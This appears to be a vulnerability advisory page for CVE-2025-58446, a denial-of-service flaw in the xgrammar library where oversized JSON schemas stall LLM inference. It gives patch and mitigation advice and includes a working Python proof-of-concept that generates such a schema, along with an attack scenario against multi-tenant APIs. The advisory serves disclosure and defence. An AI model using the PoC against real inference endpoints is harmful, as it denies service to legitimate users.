CVE-2025-58446: xgrammar: DoS via oversized JSON schema grammar parsing
GHSA-9q5r-wfvf-rr7f | Severity: MEDIUM | PoC available | CISA SSVC: Track

xgrammar v0.1.23 has a DoS vulnerability: crafted large JSON schemas (>100k characters) trigger a pathologically slow grammar optimizer, blocking model inference for minutes per request. Any model-serving endpoint that accepts user-defined JSON schemas for constrained/structured output is directly exploitable with a trivial PoC. Patch to v0.1.24 immediately; if delayed, enforce schema byte-size limits at the API gateway before requests reach the inference layer.
Risk Assessment
Effective risk is medium-high for exposed inference endpoints, despite the Medium advisory severity. The attack surface is any API that accepts caller-supplied JSON schemas for structured generation, a common pattern in agentic and enterprise LLM deployments. EPSS is very low (0.00091), suggesting no current active exploitation, but the PoC is fully public and requires zero AI/ML expertise to execute. Impact is availability, not confidentiality: a single malicious request can monopolize an inference thread for minutes, enabling throughput starvation against multi-tenant or high-availability deployments.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| xgrammar | pip | = 0.1.23 | 0.1.24 |
Only v0.1.23 is vulnerable: the slow grammar optimizer was introduced in that release and fixed in v0.1.24. If you run xgrammar v0.1.23, you are affected.
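To confirm exposure, a minimal stdlib-only check can compare the installed version against the single affected release. The `is_vulnerable` helper below is illustrative, not part of xgrammar:

```python
from importlib.metadata import PackageNotFoundError, version

def is_vulnerable(ver: str) -> bool:
    # Per the table above, only the 0.1.23 release is affected.
    return tuple(int(p) for p in ver.split(".")[:3]) == (0, 1, 23)

try:
    installed = version("xgrammar")
    status = "VULNERABLE" if is_vulnerable(installed) else "not affected"
    print(f"xgrammar {installed}: {status}")
except PackageNotFoundError:
    print("xgrammar is not installed")
```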
Recommended Action
1. **Patch**: Upgrade xgrammar to v0.1.24 or later; the fix speeds up the grammar optimizer and disables its slow paths for large grammars.
2. **Short-term workaround**: Enforce a maximum schema size limit (e.g., 50KB) at the API gateway or application layer before calling `Grammar.from_json_schema()`.
3. **Rate limiting**: Apply per-client rate limiting on constrained generation endpoints, independent of token-based limits.
4. **Detection**: Alert on grammar parsing durations exceeding 10 seconds; such latency is anomalous and indicative of exploitation.
5. **Audit exposure**: Identify all internal services and APIs that accept caller-supplied JSON schemas and pass them to xgrammar without validation.
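The short-term workaround above can be sketched as a gateway-side guard that rejects oversized schemas before they ever reach the grammar compiler. The 50KB cap and the `reject_oversized_schema` helper are illustrative, not part of xgrammar:

```python
MAX_SCHEMA_BYTES = 50 * 1024  # illustrative cap from the workaround above

def reject_oversized_schema(raw_schema: str) -> str:
    """Raise before the schema ever reaches Grammar.from_json_schema()."""
    size = len(raw_schema.encode("utf-8"))
    if size > MAX_SCHEMA_BYTES:
        raise ValueError(f"schema is {size} bytes; limit is {MAX_SCHEMA_BYTES}")
    return raw_schema
```

Because the check is pure string length, it adds negligible latency and can run in the API layer, well before any inference worker is involved.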
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Frequently Asked Questions
What is CVE-2025-58446?
xgrammar v0.1.23 has a DoS vulnerability where crafted large JSON schemas (>100k chars) trigger a pathologically slow grammar optimizer, blocking model inference for minutes per request. Any model serving endpoint that accepts user-defined JSON schemas for constrained/structured output is directly exploitable with a trivial PoC. Patch to v0.1.24 immediately; if delayed, enforce schema byte-size limits at the API gateway before requests reach the inference layer.
Is CVE-2025-58446 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2025-58446, increasing the risk of exploitation.
How to fix CVE-2025-58446?
1. **Patch**: Upgrade xgrammar to v0.1.24 or later; the fix speeds up the grammar optimizer and disables its slow paths for large grammars.
2. **Short-term workaround**: Enforce a maximum schema size limit (e.g., 50KB) at the API gateway or application layer before calling `Grammar.from_json_schema()`.
3. **Rate limiting**: Apply per-client rate limiting on constrained generation endpoints, independent of token-based limits.
4. **Detection**: Alert on grammar parsing durations exceeding 10 seconds; such latency is anomalous and indicative of exploitation.
5. **Audit exposure**: Identify all internal services and APIs that accept caller-supplied JSON schemas and pass them to xgrammar without validation.
What systems are affected by CVE-2025-58446?
This vulnerability affects the following AI/ML architecture patterns: model serving, structured output pipelines, LLM inference APIs, agentic tool-calling pipelines.
What is the CVSS score for CVE-2025-58446?
No CVSS score has been assigned yet; the GitHub advisory rates the vulnerability Medium severity.
Technical Details
NVD Description
### Summary

The provided grammar would fit in the context window of most models, but takes minutes to process in v0.1.23. In testing with v0.1.16 the parser worked fine, so this appears to be a regression caused by the Earley parser.

### Details

A full reproducer is provided in the PoC section. The resulting grammar is around 70k tokens, and the grammar parsing itself (with the models checked) took significantly longer than the LLM processing, meaning this can be used to DoS model providers.

### Patch

This problem is caused by the grammar optimizer introduced in v0.1.23 being too slow. It only happens for very large grammars (>100k characters), like the one below. v0.1.24 solved this problem by optimizing the speed of the grammar optimizer and disabling some slow optimizations for large grammars. Thanks to @Seven-Streams.

### PoC

```python
import string
import random

def enum_schema(size=10000, str_len=10):
    enum = {"enum": ["".join(random.choices(string.ascii_uppercase, k=str_len))
                     for _ in range(size)]}
    schema = {
        "definitions": {"colorEnum": enum},
        "type": "object",
        "properties": {
            "color1": {"$ref": "#/definitions/colorEnum"},
            "color2": {"$ref": "#/definitions/colorEnum"},
            "color3": {"$ref": "#/definitions/colorEnum"},
            "color4": {"$ref": "#/definitions/colorEnum"},
            "color5": {"$ref": "#/definitions/colorEnum"},
            "color6": {"$ref": "#/definitions/colorEnum"},
            "color7": {"$ref": "#/definitions/colorEnum"},
            "color8": {"$ref": "#/definitions/colorEnum"},
        },
        "required": ["color1", "color2"],
    }
    return schema

schema_enum = enum_schema()
print(schema_enum)
print(test_schema(schema_enum, {}))
```

where (this helper assumes `import json`, `import xgrammar as xgr`, and xgrammar's internal `_is_grammar_accept_string` test utility are in scope):

```python
def test_schema(schema, instance):
    grammar = xgr.Grammar.from_json_schema(
        json.dumps(schema), strict_mode=True
    )
    return _is_grammar_accept_string(grammar, json.dumps(instance))
```

### Impact

DoS.
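To see how easily the PoC crosses the >100k-character threshold that triggers the slow optimizer path, the following stdlib-only sketch (no xgrammar required) generates the same enum-heavy schema shape and measures its serialized size:

```python
import json
import random
import string

def enum_schema(size=10000, str_len=10):
    # Same shape as the advisory's PoC: one huge enum referenced eight times.
    enum = {"enum": ["".join(random.choices(string.ascii_uppercase, k=str_len))
                     for _ in range(size)]}
    return {
        "definitions": {"colorEnum": enum},
        "type": "object",
        "properties": {f"color{i}": {"$ref": "#/definitions/colorEnum"}
                       for i in range(1, 9)},
        "required": ["color1", "color2"],
    }

raw = json.dumps(enum_schema())
print(len(raw))  # well over 100,000 characters from the enum alone
```

Note that the schema itself is tiny apart from the enum: the `$ref` indirection means one 10,000-entry list inflates eight object properties, which is why a byte-size cap at the gateway is such an effective stopgap.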
Exploitation Scenario
An adversary targeting a multi-tenant LLM API (e.g., an enterprise copilot or structured data extraction service) crafts a JSON schema with thousands of enum values totaling over 100k characters — trivially generated with the public PoC. They submit this as the response_format schema in a constrained generation request. The xgrammar optimizer enters a slow computation path, blocking the inference thread for several minutes. By issuing a small number of concurrent requests (5–10), the attacker can saturate all inference workers, causing complete service unavailability for legitimate users. The attack costs pennies in compute and requires no authentication bypass or specialized knowledge, only awareness of the library version and the public PoC.
References
- github.com/advisories/GHSA-9q5r-wfvf-rr7f
- github.com/mlc-ai/xgrammar/commit/ced69c3ad2f8f61b516cc278a342e7c644383e27
- github.com/mlc-ai/xgrammar/security/advisories/GHSA-9q5r-wfvf-rr7f
- nvd.nist.gov/vuln/detail/CVE-2025-58446
- github.com/ARPSyndicate/cve-scores
- github.com/fkie-cad/nvd-json-data-feeds
Related Vulnerabilities
- CVE-2025-57809 (7.5) xgrammar: uncontrolled recursion in grammar parsing causes DoS (same package: xgrammar)
- CVE-2025-32381 (6.5) xgrammar: unbounded grammar cache causes LLM server DoS (same package: xgrammar)
- CVE-2026-25048 xgrammar: security flaw enables exploitation (same package: xgrammar)
- CVE-2026-33660 (10.0) TensorFlow: type confusion NPD in tensor conversion (same attack type: DoS)
- CVE-2022-35939 (9.8) TensorFlow: ScatterNd OOB write enables RCE/crash (same attack type: DoS)